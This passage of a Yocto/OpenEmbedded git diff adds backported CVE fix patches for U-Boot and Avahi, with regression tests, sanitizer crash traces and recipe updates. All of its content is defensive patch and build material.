+@@ -359,20 +359,39 @@ int fit_image_verify_required_sigs(const void *fit, int image_noffset,
+ return 0;
+ }
+
+-int fit_config_check_sig(const void *fit, int noffset, int required_keynode,
+- char **err_msgp)
++/**
++ * fit_config_check_sig() - Check the signature of a config
++ *
++ * @fit: FIT to check
++ * @noffset: Offset of configuration node (e.g. /configurations/conf-1)
++ * @required_keynode: Offset in the control FDT of the required key node,
++ * if any. If this is given, then the configuration wil not
++ * pass verification unless that key is used. If this is
++ * -1 then any signature will do.
++ * @conf_noffset: Offset of the configuration subnode being checked (e.g.
++ * /configurations/conf-1/kernel)
++ * @err_msgp: In the event of an error, this will be pointed to a
++ * help error string to display to the user.
++ * @return 0 if all verified ok, <0 on error
++ */
++static int fit_config_check_sig(const void *fit, int noffset,
++ int required_keynode, int conf_noffset,
++ char **err_msgp)
+ {
+ char * const exc_prop[] = {"data"};
+ const char *prop, *end, *name;
+ struct image_sign_info info;
+ const uint32_t *strings;
++ const char *config_name;
+ uint8_t *fit_value;
+ int fit_value_len;
++ bool found_config;
+ int max_regions;
+ int i, prop_len;
+ char path[200];
+ int count;
+
++ config_name = fit_get_name(fit, conf_noffset, NULL);
+ debug("%s: fdt=%p, conf='%s', sig='%s'\n", __func__, gd_fdt_blob(),
+ fit_get_name(fit, noffset, NULL),
+ fit_get_name(gd_fdt_blob(), required_keynode, NULL));
+@@ -413,9 +432,20 @@ int fit_config_check_sig(const void *fit, int noffset, int required_keynode,
+ char *node_inc[count];
+
+ debug("Hash nodes (%d):\n", count);
++ found_config = false;
+ for (name = prop, i = 0; name < end; name += strlen(name) + 1, i++) {
+ debug(" '%s'\n", name);
+ node_inc[i] = (char *)name;
++ if (!strncmp(FIT_CONFS_PATH, name, strlen(FIT_CONFS_PATH)) &&
++ name[sizeof(FIT_CONFS_PATH) - 1] == '/' &&
++ !strcmp(name + sizeof(FIT_CONFS_PATH), config_name)) {
++ debug(" (found config node %s)", config_name);
++ found_config = true;
++ }
++ }
++ if (!found_config) {
++ *err_msgp = "Selected config not in hashed nodes";
++ return -1;
+ }
+
+ /*
+@@ -483,7 +513,7 @@ static int fit_config_verify_sig(const void *fit, int conf_noffset,
+ if (!strncmp(name, FIT_SIG_NODENAME,
+ strlen(FIT_SIG_NODENAME))) {
+ ret = fit_config_check_sig(fit, noffset, sig_offset,
+- &err_msg);
++ conf_noffset, &err_msg);
+ if (ret) {
+ puts("- ");
+ } else {
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch
new file mode 100644
index 0000000000..023f7eac0a
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch
@@ -0,0 +1,52 @@
+From 8a9d03732e6d0f68107c80919096e7cf956dcb3d Mon Sep 17 00:00:00 2001
+From: Simon Glass <sjg@chromium.org>
+Date: Wed, 18 Mar 2020 11:44:02 -0600
+Subject: [PATCH] image: Load the correct configuration in fit_check_sign
+
+At present bootm_host_load_images() is passed the configuration that has
+been verified, but ignores it and just uses the default configuration.
+This may not be the same.
+
+Update this function to use the selected configuration.
+
+Signed-off-by: Simon Glass <sjg@chromium.org>
+
+CVE: CVE-2020-10648
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/8a9d03732e6d0f68107c80919096e7cf956dcb3d]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ common/bootm.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/common/bootm.c b/common/bootm.c
+index 902c13880d..db4362a643 100644
+--- a/common/bootm.c
++++ b/common/bootm.c
+@@ -819,7 +819,8 @@ void __weak switch_to_non_secure_mode(void)
+ #else /* USE_HOSTCC */
+
+ #if defined(CONFIG_FIT_SIGNATURE)
+-static int bootm_host_load_image(const void *fit, int req_image_type)
++static int bootm_host_load_image(const void *fit, int req_image_type,
++ int cfg_noffset)
+ {
+ const char *fit_uname_config = NULL;
+ ulong data, len;
+@@ -831,6 +832,7 @@ static int bootm_host_load_image(const void *fit, int req_image_type)
+ void *load_buf;
+ int ret;
+
++ fit_uname_config = fdt_get_name(fit, cfg_noffset, NULL);
+ memset(&images, '\0', sizeof(images));
+ images.verify = 1;
+ noffset = fit_image_load(&images, (ulong)fit,
+@@ -878,7 +880,7 @@ int bootm_host_load_images(const void *fit, int cfg_noffset)
+ for (i = 0; i < ARRAY_SIZE(image_types); i++) {
+ int ret;
+
+- ret = bootm_host_load_image(fit, image_types[i]);
++ ret = bootm_host_load_image(fit, image_types[i], cfg_noffset);
+ if (!err && ret && ret != -ENOENT)
+ err = ret;
+ }
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch
new file mode 100644
index 0000000000..b0a16efeaa
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch
@@ -0,0 +1,114 @@
+From 5749faa3d6837d6dbaf2119fc3ec49a326690c8f Mon Sep 17 00:00:00 2001
+From: Tom Rini <trini@konsulko.com>
+Date: Tue, 21 Jan 2020 11:53:38 -0500
+Subject: [PATCH] cmd/gpt: Address error cases during gpt rename more correctly
+
+New analysis by the tool has shown that we have some cases where we
+weren't handling the error exit condition correctly. When we ran into
+the ENOMEM case we wouldn't exit the function and thus incorrect things
+could happen. Rework the unwinding such that we don't need a helper
+function now and free what we may have allocated.
+
+Fixes: 18030d04d25d ("GPT: fix memory leaks identified by Coverity")
+Reported-by: Coverity (CID: 275475, 275476)
+Cc: Alison Chaiken <alison@she-devel.com>
+Cc: Simon Goldschmidt <simon.k.r.goldschmidt@gmail.com>
+Cc: Jordy <jordy@simplyhacker.com>
+Signed-off-by: Tom Rini <trini@konsulko.com>
+Reviewed-by: Simon Goldschmidt <simon.k.r.goldschmidt@gmail.com>
+
+CVE: CVE-2020-8432
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/5749faa3d6837d6dbaf2119fc3ec49a326690c8f]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ cmd/gpt.c | 47 ++++++++++++-----------------------------------
+ 1 file changed, 12 insertions(+), 35 deletions(-)
+
+diff --git a/cmd/gpt.c b/cmd/gpt.c
+index 0c4349f4b2..964702bad4 100644
+--- a/cmd/gpt.c
++++ b/cmd/gpt.c
+@@ -633,21 +633,6 @@ static int do_disk_guid(struct blk_desc *dev_desc, char * const namestr)
+ }
+
+ #ifdef CONFIG_CMD_GPT_RENAME
+-/*
+- * There are 3 malloc() calls in set_gpt_info() and there is no info about which
+- * failed.
+- */
+-static void set_gpt_cleanup(char **str_disk_guid,
+- disk_partition_t **partitions)
+-{
+-#ifdef CONFIG_RANDOM_UUID
+- if (str_disk_guid)
+- free(str_disk_guid);
+-#endif
+- if (partitions)
+- free(partitions);
+-}
+-
+ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ char *name1, char *name2)
+ {
+@@ -655,7 +640,7 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ struct disk_part *curr;
+ disk_partition_t *new_partitions = NULL;
+ char disk_guid[UUID_STR_LEN + 1];
+- char *partitions_list, *str_disk_guid;
++ char *partitions_list, *str_disk_guid = NULL;
+ u8 part_count = 0;
+ int partlistlen, ret, numparts = 0, partnum, i = 1, ctr1 = 0, ctr2 = 0;
+
+@@ -697,14 +682,8 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ /* set_gpt_info allocates new_partitions and str_disk_guid */
+ ret = set_gpt_info(dev_desc, partitions_list, &str_disk_guid,
+ &new_partitions, &part_count);
+- if (ret < 0) {
+- del_gpt_info();
+- free(partitions_list);
+- if (ret == -ENOMEM)
+- set_gpt_cleanup(&str_disk_guid, &new_partitions);
+- else
+- goto out;
+- }
++ if (ret < 0)
++ goto out;
+
+ if (!strcmp(subcomm, "swap")) {
+ if ((strlen(name1) > PART_NAME_LEN) || (strlen(name2) > PART_NAME_LEN)) {
+@@ -766,14 +745,8 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ * Even though valid pointers are here passed into set_gpt_info(),
+ * it mallocs again, and there's no way to tell which failed.
+ */
+- if (ret < 0) {
+- del_gpt_info();
+- free(partitions_list);
+- if (ret == -ENOMEM)
+- set_gpt_cleanup(&str_disk_guid, &new_partitions);
+- else
+- goto out;
+- }
++ if (ret < 0)
++ goto out;
+
+ debug("Writing new partition table\n");
+ ret = gpt_restore(dev_desc, disk_guid, new_partitions, numparts);
+@@ -795,10 +768,14 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ }
+ printf("new partition table with %d partitions is:\n", numparts);
+ print_gpt_info();
+- del_gpt_info();
+ out:
+- free(new_partitions);
+- free(str_disk_guid);
++ del_gpt_info();
++#ifdef CONFIG_RANDOM_UUID
++ if (str_disk_guid)
++ free(str_disk_guid);
++#endif
++ if (new_partitions)
++ free(new_partitions);
+ free(partitions_list);
+ return ret;
+ }
diff --git a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
index 613e3161fb..8234b86162 100644
--- a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
+++ b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
@@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1"
LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c"
SECTION = "libs"
-SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https"
+SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master"
SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-bsp/u-boot/u-boot-common.inc b/meta/recipes-bsp/u-boot/u-boot-common.inc
index 4a17894c49..91fe08966b 100644
--- a/meta/recipes-bsp/u-boot/u-boot-common.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-common.inc
@@ -14,10 +14,13 @@ PE = "1"
# repo during parse
SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd"
-SRC_URI = "git://git.denx.de/u-boot.git \
+SRC_URI = "git://source.denx.de/u-boot/u-boot.git;protocol=https;branch=master \
file://remove-redundant-yyloc-global.patch \
+ file://CVE-2020-8432.patch \
+ file://CVE-2020-10648-1.patch \
+ file://CVE-2020-10648-2.patch \
"
-
+
S = "${WORKDIR}/git"
B = "${WORKDIR}/build"
do_configure[cleandirs] = "${B}"
diff --git a/meta/recipes-bsp/u-boot/u-boot-tools.inc b/meta/recipes-bsp/u-boot/u-boot-tools.inc
index 8ae290acc6..4ed936a70d 100644
--- a/meta/recipes-bsp/u-boot/u-boot-tools.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-tools.inc
@@ -23,6 +23,21 @@ SED_CONFIG_EFI_armeb = ''
SED_CONFIG_EFI_aarch64 = ''
do_compile () {
+ # Yes, this is crazy. If you build on a system with git < 2.14 from scratch, the tree will
+ # be marked as "dirty" and the version will include "-dirty", leading to a reproducibility problem.
+	# The issue is the inode count for Licenses/README changing due to do_populate_lic hardlinking a
+ # copy of the file. We avoid this by ensuring the index is updated with a "git diff" before the
+ # u-boot machinery tries to determine the version.
+ #
+ # build$ ../git/scripts/setlocalversion ../git
+ # ""
+ # build$ ln ../git/
+ # build$ ln ../git/README ../foo
+ # build$ ../git/scripts/setlocalversion ../git
+ # ""-dirty
+ # (i.e. creating a hardlink dirties the index)
+ cd ${S}; git diff; cd ${B}
+
oe_runmake -C ${S} sandbox_defconfig O=${B}
# Disable CONFIG_CMD_LICENSE, license.h is not used by tools and
diff --git a/meta/recipes-bsp/v86d/v86d_0.1.10.bb b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
index a8df80fdd6..e614de0c48 100644
--- a/meta/recipes-bsp/v86d/v86d_0.1.10.bb
+++ b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
@@ -1,5 +1,6 @@
SUMMARY = "User support binary for the uvesafb kernel module"
HOMEPAGE = "https://tracker.debian.org/pkg/v86d"
+DESCRIPTION = "v86d provides a backend for kernel drivers that need to execute x86 BIOS code. The code is executed in a controlled environment and the results are passed back to the kernel via the netlink interface."
# the copyright info is at the bottom of README, expect break
LICENSE = "GPLv2"
diff --git a/meta/recipes-connectivity/avahi/avahi.inc b/meta/recipes-connectivity/avahi/avahi.inc
index 6acedb5412..e1dfc7a861 100644
--- a/meta/recipes-connectivity/avahi/avahi.inc
+++ b/meta/recipes-connectivity/avahi/avahi.inc
@@ -21,6 +21,16 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1 \
SRC_URI = "https://github.com/lathiat/avahi/releases/download/v${PV}/avahi-${PV}.tar.gz \
file://fix-CVE-2017-6519.patch \
+ file://CVE-2021-3468.patch \
+ file://CVE-2023-1981.patch \
+ file://CVE-2023-38469-1.patch \
+ file://CVE-2023-38469-2.patch \
+ file://CVE-2023-38470-1.patch \
+ file://CVE-2023-38470-2.patch \
+ file://CVE-2023-38471-1.patch \
+ file://CVE-2023-38471-2.patch \
+ file://CVE-2023-38472.patch \
+ file://CVE-2023-38473.patch \
"
UPSTREAM_CHECK_URI = "https://github.com/lathiat/avahi/releases/"
diff --git a/meta/recipes-connectivity/avahi/avahi_0.7.bb b/meta/recipes-connectivity/avahi/avahi_0.7.bb
index f6e3afb24e..0df44bffbe 100644
--- a/meta/recipes-connectivity/avahi/avahi_0.7.bb
+++ b/meta/recipes-connectivity/avahi/avahi_0.7.bb
@@ -8,6 +8,9 @@ SRC_URI += "file://00avahi-autoipd \
inherit update-rc.d systemd useradd
+# Issue only affects Debian/SUSE, not us
+CVE_CHECK_WHITELIST += "CVE-2021-26720"
+
PACKAGES =+ "libavahi-gobject avahi-daemon libavahi-common libavahi-core libavahi-client avahi-dnsconfd libavahi-glib avahi-autoipd avahi-utils"
LICENSE_libavahi-gobject = "LGPLv2.1+"
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
new file mode 100644
index 0000000000..638a1f6071
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
@@ -0,0 +1,42 @@
+From 447affe29991ee99c6b9732fc5f2c1048a611d3b Mon Sep 17 00:00:00 2001
+From: Riccardo Schirone <sirmy15@gmail.com>
+Date: Fri, 26 Mar 2021 11:50:24 +0100
+Subject: [PATCH] Avoid infinite-loop in avahi-daemon by handling HUP event in
+ client_work
+
+If a client fills the input buffer, client_work() disables the
+AVAHI_WATCH_IN event, thus preventing the function from executing the
+`read` syscall the next times it is called. However, if the client then
+terminates the connection, the socket file descriptor receives a HUP
+event, which is not handled, thus the kernel keeps marking the HUP event
+as occurring. While iterating over the file descriptors that triggered
+an event, the client file descriptor will keep having the HUP event and
+the client_work() function is always called with AVAHI_WATCH_HUP but
+without nothing being done, thus entering an infinite loop.
+
+See https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984938
+
+Upstream-Status: Backport
+CVE: CVE-2021-3468
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ avahi-daemon/simple-protocol.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/avahi-daemon/simple-protocol.c b/avahi-daemon/simple-protocol.c
+index 3e0ebb11..6c0274d6 100644
+--- a/avahi-daemon/simple-protocol.c
++++ b/avahi-daemon/simple-protocol.c
+@@ -424,6 +424,11 @@ static void client_work(AvahiWatch *watch, AVAHI_GCC_UNUSED int fd, AvahiWatchEv
+ }
+ }
+
++ if (events & AVAHI_WATCH_HUP) {
++ client_free(c);
++ return;
++ }
++
+ c->server->poll_api->watch_update(
+ watch,
+ (c->outbuf_length > 0 ? AVAHI_WATCH_OUT : 0) |
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
new file mode 100644
index 0000000000..1209864402
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
@@ -0,0 +1,60 @@
+Backport of:
+
+From a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Thu, 17 Nov 2022 01:51:53 +0100
+Subject: [PATCH] Emit error if requested service is not found
+
+It currently just crashes instead of replying with error. Check return
+value and emit error instead of passing NULL pointer to reply.
+
+Fixes #375
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-1981.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f]
+CVE: CVE-2023-1981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-daemon/dbus-protocol.c | 20 ++++++++++++++------
+ 1 file changed, 14 insertions(+), 6 deletions(-)
+
+--- a/avahi-daemon/dbus-protocol.c
++++ b/avahi-daemon/dbus-protocol.c
+@@ -391,10 +391,14 @@ static DBusHandlerResult msg_server_impl
+ }
+
+ t = avahi_alternative_host_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
+-
+- return DBUS_HANDLER_RESULT_HANDLED;
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
++
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Hostname not found");
++ }
+
+ } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "GetAlternativeServiceName")) {
+ char *n, *t;
+@@ -405,10 +409,14 @@ static DBusHandlerResult msg_server_impl
+ }
+
+ t = avahi_alternative_service_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
+-
+- return DBUS_HANDLER_RESULT_HANDLED;
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
++
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Service not found");
++ }
+
+ } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "EntryGroupNew")) {
+ Client *client;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
new file mode 100644
index 0000000000..12dad9ef6f
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
@@ -0,0 +1,48 @@
+From a337a1ba7d15853fb56deef1f464529af6e3a1cf Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Mon, 23 Oct 2023 20:29:31 +0000
+Subject: [PATCH] core: reject overly long TXT resource records
+
+Closes https://github.com/lathiat/avahi/issues/455
+
+CVE-2023-38469
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a337a1ba7d15853fb56deef1f464529af6e3a1cf]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/rr.c | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-core/rr.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/rr.c
++++ avahi-0.7/avahi-core/rr.c
+@@ -32,6 +32,7 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/defs.h>
+
++#include "dns.h"
+ #include "rr.h"
+ #include "log.h"
+ #include "util.h"
+@@ -688,11 +689,17 @@ int avahi_record_is_valid(AvahiRecord *r
+ case AVAHI_DNS_TYPE_TXT: {
+
+ AvahiStringList *strlst;
++ size_t used = 0;
+
+- for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next)
++ for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) {
+ if (strlst->size > 255 || strlst->size <= 0)
+ return 0;
+
++ used += 1+strlst->size;
++ if (used > AVAHI_DNS_RDATA_MAX)
++ return 0;
++ }
++
+ return 1;
+ }
+ }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
new file mode 100644
index 0000000000..a62c718ebe
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
@@ -0,0 +1,65 @@
+From c6cab87df290448a63323c8ca759baa516166237 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Wed, 25 Oct 2023 18:15:42 +0000
+Subject: [PATCH] tests: pass overly long TXT resource records
+
+to make sure they don't crash avahi any more.
+It reproduces https://github.com/lathiat/avahi/issues/455
+
+Canonical notes:
+nickgalanis> removed first hunk since there is no .github dir in this release
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/c6cab87df290448a63323c8ca759baa516166237]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 14 ++++++++++++++
+ 1 files changed, 14 insertions(+)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -22,6 +22,7 @@
+ #endif
+
+ #include <stdio.h>
++#include <string.h>
+ #include <assert.h>
+
+ #include <avahi-client/client.h>
+@@ -33,6 +34,8 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/timeval.h>
+
++#include <avahi-core/dns.h>
++
+ static const AvahiPoll *poll_api = NULL;
+ static AvahiSimplePoll *simple_poll = NULL;
+
+@@ -222,6 +225,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ uint32_t cookie;
+ struct timeval tv;
+ AvahiAddress a;
++ uint8_t rdata[AVAHI_DNS_RDATA_MAX+1];
++ AvahiStringList *txt = NULL;
++ int r;
+
+ simple_poll = avahi_simple_poll_new();
+ poll_api = avahi_simple_poll_get(simple_poll);
+@@ -258,6 +264,14 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
+ printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
+
++ memset(rdata, 1, sizeof(rdata));
++ r = avahi_string_list_parse(rdata, sizeof(rdata), &txt);
++ assert(r >= 0);
++ assert(avahi_string_list_serialize(txt, NULL, 0) == sizeof(rdata));
++ error = avahi_entry_group_add_service_strlst(group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", "_qotd._tcp", NULL, NULL, 123, txt);
++ assert(error == AVAHI_ERR_INVALID_RECORD);
++ avahi_string_list_free(txt);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
new file mode 100644
index 0000000000..82fb1ab40b
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
@@ -0,0 +1,57 @@
+From 94cb6489114636940ac683515417990b55b5d66c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Tue, 11 Apr 2023 15:29:59 +0200
+Subject: [PATCH] Ensure each label is at least one byte long
+
+The only allowed exception is single dot, where it should return empty
+string.
+
+Fixes #454.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c]
+CVE: CVE-2023-38470
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain-test.c | 14 ++++++++++++++
+ avahi-common/domain.c | 2 +-
+ 2 files changed, 15 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain-test.c
++++ avahi-0.7/avahi-common/domain-test.c
+@@ -45,6 +45,20 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ printf("%s\n", s = avahi_normalize_name_strdup("fo\\\\o\\..f oo."));
+ avahi_free(s);
+
++ printf("%s\n", s = avahi_normalize_name_strdup("."));
++ avahi_free(s);
++
++ s = avahi_normalize_name_strdup(",.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}."
++ "}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}"
++ ".?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`"
++ "?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?."
++ "?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}."
++ "??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}?"
++ "?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM."
++ "?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?."
++ "}.?.?.?.}.=.?.?.}");
++ assert(s == NULL);
++
+ printf("%i\n", avahi_domain_equal("\\065aa bbb\\.\\046cc.cc\\\\.dee.fff.", "Aaa BBB\\.\\.cc.cc\\\\.dee.fff"));
+ printf("%i\n", avahi_domain_equal("A", "a"));
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -201,7 +201,7 @@ char *avahi_normalize_name(const char *s
+ }
+
+ if (!empty) {
+- if (size < 1)
++ if (size < 2)
+ return NULL;
+
+ *(r++) = '.';
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
new file mode 100644
index 0000000000..403ed6fd6a
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
@@ -0,0 +1,53 @@
+From 20dec84b2480821704258bc908e7b2bd2e883b24 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 19 Sep 2023 03:21:25 +0000
+Subject: [PATCH] [common] bail out when escaped labels can't fit into ret
+
+Fixes:
+```
+==93410==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f9e76f14c16 at pc 0x00000047208d bp 0x7ffee90a6a00 sp 0x7ffee90a61c8
+READ of size 1110 at 0x7f9e76f14c16 thread T0
+ #0 0x47208c in __interceptor_strlen (out/fuzz-domain+0x47208c) (BuildId: 731b20c1eef22c2104e75a6496a399b10cfc7cba)
+ #1 0x534eb0 in avahi_strdup avahi/avahi-common/malloc.c:167:12
+ #2 0x53862c in avahi_normalize_name_strdup avahi/avahi-common/domain.c:226:12
+```
+and
+```
+fuzz-domain: fuzz/fuzz-domain.c:38: int LLVMFuzzerTestOneInput(const uint8_t *, size_t): Assertion `avahi_domain_equal(s, t)' failed.
+==101571== ERROR: libFuzzer: deadly signal
+ #0 0x501175 in __sanitizer_print_stack_trace (/home/vagrant/avahi/out/fuzz-domain+0x501175) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #1 0x45ad2c in fuzzer::PrintStackTrace() (/home/vagrant/avahi/out/fuzz-domain+0x45ad2c) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #2 0x43fc07 in fuzzer::Fuzzer::CrashCallback() (/home/vagrant/avahi/out/fuzz-domain+0x43fc07) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #3 0x7f1581d7ebaf (/lib64/libc.so.6+0x3dbaf) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #4 0x7f1581dcf883 in __pthread_kill_implementation (/lib64/libc.so.6+0x8e883) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #5 0x7f1581d7eafd in gsignal (/lib64/libc.so.6+0x3dafd) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #6 0x7f1581d6787e in abort (/lib64/libc.so.6+0x2687e) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #7 0x7f1581d6779a in __assert_fail_base.cold (/lib64/libc.so.6+0x2679a) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
